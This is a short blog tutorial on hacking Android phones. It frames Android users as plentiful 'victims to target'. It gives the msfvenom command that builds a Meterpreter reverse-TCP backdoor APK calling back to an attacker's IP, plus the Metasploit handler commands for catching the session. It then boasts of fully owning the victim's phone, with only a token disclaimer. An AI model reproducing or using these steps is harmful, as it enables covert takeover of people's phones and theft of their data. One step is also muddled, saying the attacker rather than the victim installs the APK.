Updated: May 7
Why Hack Android Phones?
Yeah! you read it right, the first question comes into picture is why in the world we would like to hack Android Phones?
The answer is really simple, the majority of people out there are Android users so you have a lot of victims to target.
But seriously don’t hack anyone’s device without their permission otherwise you will get into a lot of trouble for doing android hacking.
Metasploit Framework (Pre-Installed on Kali Linux)
Victims Android Smartphone (Try to use it on your phone only)
Lil bit of mind too ;P
Steps To Hack Android SmartPhone
So now let's get into it.
We will be using Metasploit Venom Framework to create an exploit/backdoor for this tutorial.
Use the following commands to get control of the user's device
Generate the exploit/Backdoor for the victim.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk
Let me explain the above Command
We are using msfvenom as the exploit generator for our Android device using Meterpreter for the reverse connection into the attacker’s system. LHOST gives the attacker's IP address where he will get the reverse connection from the victim and the same with the LPORT connection will be made on port 4444 and R >is used to create the executable file.
Now we are all set for the next step, because this payload uses reverse_tcp, the attacker will listen to the victim's reverse connection port indicated in the payload. So now we have to set up a handler to manage incoming port connections,
Let’s do this...
use exploit/multi/handler set payload android/meterpreter/reverse_tcp
Now we will check for any open connections on the attacker’s device.
set lhost 192.168.1.104 set lport 4444 exploit
Remember that the LHOST & LPORT are going to be the attacker's IP address & port to listen to the reverse connection and exploit to start listening.
Now, as soon as the attacker installs the exploit / backdoor APK, you will get the reverse meterpreter session like this on your terminal.
Finally lets rock !
We have hacked the smartphone.
Here's some information we've extracted from the Android device,
Hence the victim’s phone has completely been owned.
Type help in meterpreter session and lets rock, u can do anything...
Subscribe us on : www.boredprogrammers.com
Disclaimer - The thing explained above is for education purpose only; none of the authors, contributors, administrators, or anyone else connected with BoredProgrammers, in any way whatsoever, will be responsible for the use of the information contained in or linked from these web pages.